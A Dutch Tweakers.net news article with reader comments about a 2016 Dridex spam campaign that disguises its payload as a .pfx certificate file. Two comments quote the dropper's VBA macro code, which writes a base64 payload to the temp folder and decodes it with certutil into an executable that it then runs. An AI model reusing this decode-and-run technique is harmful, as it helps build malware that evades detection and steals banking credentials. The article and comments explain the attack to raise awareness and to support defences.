Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , 36 reacties

Een nieuwe vorm van Dridex-malware blijkt na een korte periode van inactiviteit vooral actief te zijn in Amerika. De via spam verspreide malware doet zich voor als een certificaat om aan detectie te ontsnappen.

In een blogpost beschrijft beveiligingsbedrijf Trend Micro dat de spam-e-mail zich voordoet als een notificatie van het feit dat er een ongeautoriseerde toegangspoging tot een onbepaald account heeft plaatsgevonden. Daarbij wordt een ip-adres vermeld waarvan de poging afkomstig zou zijn, om de indruk van een legitiem bericht te wekken.

De mail roept de gebruiker op een zip-bestand te openen om een volledig rapport van het 'incident' te lezen. Eenmaal uitgepakt bevat het bestand een leeg Word-document, dat de gebruiker vraagt om macro's in te schakelen om de inhoud te kunnen zien. Doet de gebruiker dit, dan vindt infectie plaats. Infectie via macro's is niet nieuw en is een veelgebruikte manier malware te verspreiden.

Volgens Trend Micro is het echter opvallend dat er naast macro's ook gebruikt wordt gemaakt van een pfx-bestand, dat bij het uitpakken van het zip-archief op het systeem terecht komt. Dit soort bestanden bevatten normaal gesproken informatie over publieke en geheime sleutels in het kader van overdracht van certificaten. Het pfx-bestand is versleuteld en wordt door het Windows-onderdeel Certutil omgezet in een uitvoerbaar exe-bestand, waarna infectie plaatsvindt.

Door de vermomming als pfx-bestand is de kwaadaardige software moeilijker te detecteren en tegen te gaan, zo schrijft Trend Micro. Dridex-malware is er vooral op gericht om financiële informatie te achterhalen, bijvoorbeeld inloggegevens voor internetbankieren. Het gebruik van pfx-bestanden toont volgens het beveiligingsbedrijf aan dat de ontwikkeling van de malware nog steeds in gang is.

Moderatie-faq Wijzig weergave

Reacties (36)

Tweakers.net
Volgens Trend Micro is het echter opvallend dat er naast macro's ook gebruikt wordt gemaakt van een pfx-bestand, dat bij het uitpakken van het zip-archief op het systeem terecht komt.
Trendlab
There are slight changes in this particular DRIDEX spam run. When you open the .ZIP file attachment and the word document, a .PFX file is dropped. However, this won’t necessairly run on your system because it’s encrypted. This is where Certutil comes in, decoding a base64-text file to convert the .PFX file to .EXE file. When the .PFX file is finally converted into an executable file, DRIDEX infects your system.
Als ik Trendlab goed begrijp wordt - in tegenstelling tot het stuk van T.net - de PFX dus pas gemaakt door de Macro in het Word document (en zit deze niet in de ZIP).

Wat mij nog onduidelijk is, is wie/wat de conversie van PFX->EXE triggert (is daar een nieuwe dubbelklik voor nodig, zo ja: dan beperkt dit wel de kans op infectie) en is coversie naar EXE voldoende voor de infectie, of moet de EXE ook nog uitgevoerd worden (zowel T.net als TrendLab zijn daar niet duidelijk in)
Volgens Trend Micro is het echter opvallend dat er naast macro's ook gebruikt wordt gemaakt van een pfx-bestand, dat bij het uitpakken van het zip-archief op het systeem terecht komt. Dit soort bestanden bevatten normaal gesproken informatie over publieke en geheime sleutels in het kader van overdracht van certificaten. Het pfx-bestand is versleuteld en wordt door het Windows-onderdeel Certutil omgezet in een uitvoerbaar exe-bestand, waarna infectie plaatsvindt.
Ik vind het merkwaardig dat TrendMicro stelt dat het PFX file versleuteld is, het is hooguit base64 encoded. Als je de MSDN documentatie van Certutil erbij pakt dan is dat gelijk al duidelijk. Het enige doel dat Certutil in dit geval heeft is het base64 decoden van het stukje malware buiten MS Office om zodat detectiesoftware niet gelijk een (malicious) executable naar disk weggeschreven ziet worden vanuit Word.

Overigens is deze 'Certutil'-techniek al ruim een week geleden door een researcher beschreven: http://www.malwaretech.co...payload-distribution.html . Op zijn blog wordt ook het stuk VBA code wordt getoond dat verantwoordelijk is voor het aanroepen van Certutil.
[...]

Als ik Trendlab goed begrijp wordt - in tegenstelling tot het stuk van T.net - de PFX dus pas gemaakt door de Macro in het Word document (en zit deze niet in de ZIP).

Wat mij nog onduidelijk is, is wie/wat de conversie van PFX->EXE triggert (is daar een nieuwe dubbelklik voor nodig, zo ja: dan beperkt dit wel de kans op infectie) en is coversie naar EXE voldoende voor de infectie, of moet de EXE ook nog uitgevoerd worden (zowel T.net als TrendLab zijn daar niet duidelijk in)
Het uitvoeren van de macro triggert de 'conversie'. Zoals blijkt uit de gedumpte VBA code op de blog van Malwaretech wordt de executable gelijk uitgevoerd na het decoden:
FileObject = CreateObject("Scripting.FileSystemObject")
target = Environ("TEMP") & "\microsoft.pfx"
file = FileObject.CreateTextFile(target, True)
file.Write(base64)
file.Close Shell("cmd /c certutil -decode %TMP%\\microsoft.pfx %TMP%\\microsoft.exe & start %TMP%\\microsoft.exe")

[Reactie gewijzigd door photofreak op 2 juni 2016 19:20]

Nope, geen dubbelklik meer voor nodig volgens Malwaretech.com;
FileObject = CreateObject
("Scripting.FileSystemObject")
target = Environ("TEMP") & "\microsoft.pfx"
file = FileObject.CreateTextFile(target, True)
file.Write(base64)
file.Close Shell("cmd /c certutil -decode %TMP%\\microsoft.pfx %TMP%\\microsoft.exe & start %TMP%\\microsoft.exe")

What this does is dumps the Base64 encoded string to a file named "microsoft.pfx" (pfx files are used to store PKCS#12 certificates), then it uses "certutil" to Base64 decode it, like you'd do with a regular certificate, into a file named microsoft.exe where it can be run. Link

[Reactie gewijzigd door Baserk op 1 juni 2016 19:26]

Wat mij nog onduidelijk is, is wie/wat de conversie van PFX->EXE triggert (is daar een nieuwe dubbelklik voor nodig, zo ja: dan beperkt dit wel de kans op infectie) en is coversie naar EXE voldoende voor de infectie, of moet de EXE ook nog uitgevoerd worden (zowel T.net als TrendLab zijn daar niet duidelijk in)
Hoewel ik toegeef dat ze er onduidelijk in zijn lijkt het mij onwaarschijnlijk dat er nog verdere actie van de gebruiker nodig is. De Word macro taal (Visual Basic for Applications) is prima in staat om zelfstandig commando's uit te voeren die dergelijke acties tot gevolg hebben. Ik denk dat de onduidelijkheid ontstaan is doordat men de werking van deze malware wat meer inzichtelijk heeft proberen te maken voor de gemiddelde lezer.
Dat iemand een zip bestand van een vreemde opent en tweemaal uitvoert dan ben je al niet al te helder bezig maar certutil is pas beschikbaar in windows 8.1 en windows 10
Gebruikers van windows 7 kan dit dus niet eens overkomen.
Ik heb zo'n 120 van die mails per dag gekregen en ze kwamen door de spam en virus filters van Google heen voor een paar dagen, ondanks het melden van deze e-mails.

Ik kan me voorstellen dat veel mensen denken dat als je iets vaker krijgt en Google ziet het niet als virus, dat het dan ook geen virus is. Onterecht, maar tja..


Merk op dat dit een paar weken geleden ongezipt verstuurd werd, toen met een hogere verzend dichtheid tot wel 600 per dag ontving ik er.
Ook dat duurde even, maar werd sneller als virus gedetecteerd.

[Reactie gewijzigd door djwice op 1 juni 2016 23:36]

Welke dorpsgek opent er nu een zip bestand van een onbekende?
99% van alle normale kantoormedewerkers is zo gek.
Echt... Zo komen hier dagelijks voorbij...
Een computer-rijbewijs zou eigenlijk verplicht moeten zijn voordat iemand een email-adres krijgt.
Ehm, 99% van de computergebruikers (zoniet 100%)...

Of durf jij daadwerkelijk te zeggen dat jij de maker van elk zip-bestand wat je ooit opent echt daadwerkelijk kent en weet dat die het doelbewust naar jou toegestuurd heeft?

T.net heeft er een hele rubriek voor vol met zip's / exe's van onbekenden genaamd "Downloads"

Om nog maar te zwijgen over office gebruikers die continu zip-bestanden met aparte extensies openen.

[Reactie gewijzigd door Gomez12 op 2 juni 2016 00:55]

Als ik een zip bestand ontvang weet ik heel goed of dit van een bekende is of niet, dus ja, dat durf ik daadwerkelijk te zeggen.

Aan de inhoud van de mail zie ik ook of een bekende dit bewust gezonden heeft.

Mocht dit zijn omdat hij of zij geÔnfecteerd is dan mail ik de persoon in kwestie hierover

[Reactie gewijzigd door Kees de Jong op 2 juni 2016 01:17]

Als ik een zip bestand ontvang weet ik heel goed of dit van een bekende is of niet, dus ja, dat durf ik daadwerkelijk te zeggen.

Aan de inhoud van de mail zie ik ook of een bekende dit bewust gezonden heeft.
Dat is leuk voor mail, maar kan je hetzelfde ook nog zeggen over downloads?
Uiteraard ik ben een gevorderde gebruiker en download alleen uit bekende bronnen en zelfs deze worden na downloaden geopend in een sandbox, ook vertrouwde bronnen kunnen wel eens geÔnfecteerde bestanden hebben :)

Dat laatste raadt ik jou ook aan om te doen, je maakt je geloof ik nogal zorgen omtrent het downloaden.
Je wil niet weten hoeveel "gevorderde gebruikers" ik aan de telefoon heb gehad die niet eens kunnen zeggen welke webbrowser ze gebruiken...
iemands profiel even bekijken zegt vaak meer dan woorden.
Ik twijfel ook niet aan je kwalificaties, en als ik dat impliceerde was dat zeker niet mijn bedoeling, maar diezelfde redenering hoor je veel te vaak vandaag de dag van mensen die zichzelf heel wat vinden maar ondertussen het verschil tussen Edge, Chrome of Firefox niet kunnen zien.
Voor mensen die gevorde gebruikers zijn is dat ook een typisch gegeven.

Klant die Microsoft aan de lijn heeft: "ik heb al 10 keer op F1 help gedrukt, wannneer komt er nu iemand van Microsoft om te helpen?
Wanneer de onbekende een dienst lijkt te zijn waar je een account hebt, zoals Google of Facebook.
Het is heel makkelijk om uit naam van Google een mail te versturen met alle gebruikelijke logo's, met een waarschuwing dat een onbekende jouw account geprobeerd heeft te openen en dat het begeleidende rapport meer informatie bevat.
Ik gooi dagelijks een 20 tal van dat soort mails direc tin de prullenbak, ik neem aan dat je doelt op de gemiddelde thuisgebruiker die het misschien in onwetendheid opent..
Simpelweg in je spamfilter de macro-enabled Word documenten niet toestaan.
Vorige week heb ik ze hier op de zaak ook langs zien komen en daarna direct geblockt.
Ik heb dat soort docs nooit verstuurd.
Wil je het wel? Pass protected zip is je oplossing..

TIP: SaneSecurity FoxHole database in je spamfilter laden. Haalt de vreemde zipjes er zo voor je uit!
Nog zo'n gevalletje van wat een drama ... als de gebruiker een zip file opent van een niet bekend mailadres zonder achterliggende reden dat de gebruiker zoiets Łberhaupt moet ontvangen.
  • Onverwachte mail.
  • Verdachte bijlage.
  • Verdachte zip.
  • Verdacht word-document.
  • Verdachte melding over macro's.
DING DING DING

Gebruikers dit soort 'malware' overkomen kunnen beter een dichtgetimmerde versie van een OS gebruiken dan iets waarbij ze moeten nadenken.
* e-mail van bekend bedrijf, over een account dat ik heb
* brief zit in bijlage, dat is gebruikelijk voor brieven
* die stomme macro meldingen ook altijd, OK

Voor de gemiddelde/beginnende computergebruiker zijn de alarmbellen niet zo duidelijk. Daarom is een virusscanner en spamfilter zo belangrijk. Deze moeten dergelijke mails tegenhouden om de gebruiker te beschermen. Jij noemt dat dichtgetimmerd OS, dat is een (verdergaand) alternatief waarmee gebruikers zich niet kunnen ontwikkelen.
Brief zit in bijlage, klopt. Maar een brief zit niet in een zip. Mailtjes met een zip is bij voorbaat al in 99% van de gevallen verdacht.
Ik werk bij een hosting provider en buiten dat je via de apis je aangevraagde certificaten van een leverancier krijgt komt er ook vaak een mailtje ... met een zip waar de ca bundle en cert in zit. Zo vreemd is een zipje niet in die wereld...
In dat geval verwacht je deze specifieke mail en iemand die certs zal aanvragen is over het algemeen wat beter op de hoogte van IT-zaken.
Voor veel mensen is een zipje:

Click open, ik zie een windows Explorer mapje dat open is met een file, klik file.
-- gebruiker denk: ik had vast niet (goed) gedubbel klikt.

En is nu Word opend al lang weer vergeten dat dit gebeurt is, en denkt de word file direct uit de mail te openen.
2 Kb/16 Kb (leeg word document)

van een mail die je niet kent
in een ZIP file
bedrijf wat je niet kan natrekken (bellen/appen/smsen?)
macro-melding in word..

^ zoals true al zegt: DING DING DING DING

sorry dat ik het zeg.. maar 'beginnende' 'niet' computer gebruikers' zonder enige training what so ever.. hebben uberhaubt niks te zoeken op een pc met admin rechten.
als je echt ZO stom/onwetend bent (want dat ben je dan in de ogen van menig ITer, ZELFS als je manager 3.0 bent!!)

want kom op man.. het is 2016.. als mensen het nu NOG niet weten... (de 70 jarige bejaarde buiten beschouwing gelaten) en je zou werken in een bedrijf of nuttige info op je pc hebben staan..

dan VERDIEN je 't gewoon al het gezeik. alleen zo jammer dat dit soort mensen het nooit zelf hoeven te verantwoorden/op te lossen. daar zouden ze een boel van leren.
dan doe je zulke stomme dingen 1x en daarna nooit meer.
2 Kb/16 Kb (leeg word document)
van een mail die je niet kent
in een ZIP file
bedrijf wat je niet kan natrekken (bellen/appen/smsen?)
macro-melding in word..
Het aantal kb's zegt vrijwel niemand wat.
De mail lijkt afkomstig te zijn van een bedrijf waar je een account hebt (Google, Facebook, etc.)
In een ZIP-file is op zich vreemd, maar niet meteen verontrustend.
Het bedrijf ken je (Google, Facebook, etc.), maar wie neemt de moete contact te zoeken en hoe kom je met ze in contact wanneer je dat zou willen?
Bij de macro-melding zou je je af kunnen vragen waarom er een macro in de brief moet zitten, maar je moet al een redelijke computerdeskundige zijn om te weten wat een macro is en waarom het vreemd is dat deze in een brief zit.

Niet iedereen is een computerdeskundige en dat kan ze niet kwalijk genomen worden.
Toen ik het bericht las had ik in eerste instantie ook wel zoiets dat je wel een erg onkundige gebruiker moet zijn om de macro's in te schakelen op een word document dat per email binnenkomt. Aan de andere kant zou het zeker in een zakelijke omgeving zo moeten zijn dat een dergelijke onkundige gebruiker niet tot verregaande schade leidt. Dat het lastig is om het uitvoeren van willekeurige scripts en executables te blokkeren doet daar verder niet zoveel aan af, het blijft toch een belangrijke tekortkoming van het systeem.

Zelfde geldt in min of meerdere mate voor thuisgebruikers. Hoewel ze misschien zelf zo gemakzuchtig zijn om overal ja op te klikken zou het al een stuk schelen als Windows je standaard niet met een admin account laat werken. Op het moment dat je iedere keer als er iets op admin niveau moet gebeuren gevraagd wordt om een wachtwoord (zoals bij Linux sudo) denk je wel twee keer na voordat je verder gaat. En in tegenstelling tot in het verleden komt het tegenwoordig bij normaal gebruik weinig meer voor dat er om admin rechten gevraagd wordt.

[Reactie gewijzigd door Tribits op 1 juni 2016 19:07]

Aan de andere kant zou het zeker in een zakelijke omgeving zo moeten zijn dat een dergelijke onkundige gebruiker niet tot verregaande schade leidt.
Dat is een bijna onmogelijke taak... Want meestal heeft een medewerker nog wel zijn eigen zakelijke bestanden (offertes / projecten etc) die die moet kunnen bewerken en als die weg zijn dan kan alsnog menig proces stil komen te liggen
Het pfx-bestand is versleuteld en wordt door het Windows-onderdeel Certutil omgezet in een uitvoerbaar exe-bestand, waarna infectie plaatsvindt.
Slim. Ze encrypten de malware, geven het een "veilige" extensie en klaar is kees.

Maar voor je op dit punt bent aangekomen heb je als gebruiker al goed lopen prutsen.
Zoals sommige mensen zouden zeggen... dat is kniftig gedaan... Maar nog beter kunnen dat soort mensen hun talent beter besteden aan goede dingen i.p.v. diefstal
Als je niet onnodig met beheersrechten werkt kan het pfx-bestand niet "op het systeem" terechtkomen.
toch maar ook een .pfx filter naar quarantaine ingesteld voor mail verkeer.

Wie heeft een .pfx filter ook al op zijn http(s) of proxy verkeer ingesteld?

Op dit item kan niet meer gereageerd worden.



Nintendo Switch Google Pixel Sony PlayStation VR Samsung Galaxy S8 Apple iPhone 7 Dishonored 2 Google Android 7.x Watch_Dogs 2

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True